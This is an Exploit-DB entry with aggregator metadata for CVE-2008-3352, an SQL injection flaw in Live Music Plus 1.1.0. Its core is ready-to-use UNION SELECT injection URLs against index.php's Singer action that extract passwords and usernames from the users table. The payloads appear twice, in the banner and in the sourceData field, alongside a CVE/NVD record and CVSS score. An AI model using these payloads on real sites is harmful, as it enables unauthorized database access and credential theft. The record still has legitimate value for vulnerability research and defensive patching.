Live Music Plus 1.1.0 id Remote SQL Injection Vulnerability
2008-07-24T00:00:00
ID EDB-ID:6128 Type exploitdb Reporter IRAQI Modified 2008-07-24T00:00:00
Description
Live Music Plus 1.1.0 (id) Remote SQL Injection Vulnerability. CVE-2008-3352. Webapps exploit for php platform
###############################################################
#################### i love abeer ####################
##
## Remote SQL injection Vulnerability
##
## Live Music Plus v1.1.0
##
###############################################################
###############################################################
##
## AuTh0r : IRAQI
##
##
##
## Email : expl0it.zone@googlemail.com
##
##
########################
########################
##
## -[[: Exploite :]]-
##
## http://www.xxx.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/*
##
## index.php?act=Singer&id=-1 UNION SELECT 1,password,3,4,5,6 FROM a5421577_db2.users--
##
########################
########################
1) Download script : http://www.nersoft.com/
2) Passwords Md5
#############################################################################
# milw0rm.com [2008-07-24]
{"published": "2008-07-24T00:00:00", "id": "EDB-ID:6128", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "b91b35816ce76acc5e32896f77f850b5eb506a9937ae564f684dc58c096ed659", "description": "Live Music Plus 1.1.0 (id) Remote SQL Injection Vulnerability. CVE-2008-3352. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/6128/", "lastseen": "2016-02-01T00:16:12", "edition": 1, "title": "Live Music Plus 1.1.0 id Remote SQL Injection Vulnerability", "osvdbidlist": ["47139"], "modified": "2008-07-24T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3352"], "sourceHref": "https://www.exploit-db.com/download/6128/", "references": [], "reporter": "IRAQI", "sourceData": "###############################################################\n#################### i love abeer ####################\n##\n## Remote SQL injection Vulnerability\n##\n## Live Music Plus v1.1.0\n## \n###############################################################\n###############################################################\n##\n## AuTh0r : IRAQI\n\n##\n##\n##\n## Email : expl0it.zone@googlemail.com\n##\n##\n########################\n########################\n##\n## -[[: Exploite :]]-\n##\n## http://www.xxx.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/*\n##\n## index.php?act=Singer&id=-1 UNION SELECT 1,password,3,4,5,6 FROM a5421577_db2.users--\n##\n########################\n########################\n \n1) Download script : http://www.nersoft.com/\n2) Passwords Md5\n \n#############################################################################\n\n# milw0rm.com [2008-07-24]\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2008-3352", "type": "cve", "title": "CVE-2008-3352", "description": "SQL injection vulnerability in index.php in Live Music Plus 1.1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter in a Singer action.", "published": "2008-07-28T13:41:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3352", "cvelist": ["CVE-2008-3352"], "lastseen": "2017-09-29T14:26:00"}]}}
